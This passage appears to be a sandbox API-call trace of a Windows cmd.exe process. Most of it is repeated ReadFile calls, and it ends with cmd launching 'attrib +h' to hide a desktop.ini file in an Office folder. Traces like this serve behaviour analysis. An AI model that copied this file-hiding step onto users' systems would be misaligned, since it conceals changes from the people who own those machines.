(in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 
[0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, 
lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 
lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: 
lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.559] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.560] ReadFile (in: hFile=0x58, 
lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile 
(in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.561] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.580] _close (_FileHandle=4) returned 0 [0152.581] FindNextFileW (in: hFindFile=0x302810, lpFindFileData=0x1af0e8 | out: lpFindFileData=0x1af0e8) returned 0 [0152.581] GetLastError () returned 0x12 [0152.581] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.581] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0152.583] _close (_FileHandle=3) returned 0 [0152.583] GetConsoleTitleW (in: lpConsoleTitle=0x1af520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.584] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.584] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.584] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.584] GetLastError () returned 0x2 [0152.584] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.584] GetLastError () returned 0x2 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302e80 [0152.584] FindClose (in: hFindFile=0x302e80 | out: hFindFile=0x302e80) returned 1 [0152.584] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.585] GetLastError () returned 0x2 [0152.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302e80 [0152.585] FindClose (in: hFindFile=0x302e80 | out: hFindFile=0x302e80) returned 1 [0152.585] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.585] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.585] GetConsoleTitleW (in: lpConsoleTitle=0x1af2b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.585] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af13c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af204 | out: lpAttributeList=0x1af13c, lpSize=0x1af204) returned 1 [0152.585] UpdateProcThreadAttribute (in: lpAttributeList=0x1af13c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af1fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af13c, lpPreviousValue=0x0) returned 1 [0152.585] GetStartupInfoW (in: lpStartupInfo=0x1af0f8 | out: lpStartupInfo=0x1af0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.585] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.585] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af198*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1e4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessInformation=0x1af1e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x56c, dwThreadId=0xd5c)) returned 1 [0152.587] CloseHandle (hObject=0x50) returned 1 [0152.587] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.587] GetEnvironmentStringsW () returned 0x302e80* [0152.587] FreeEnvironmentStringsW (penv=0x302e80) returned 1 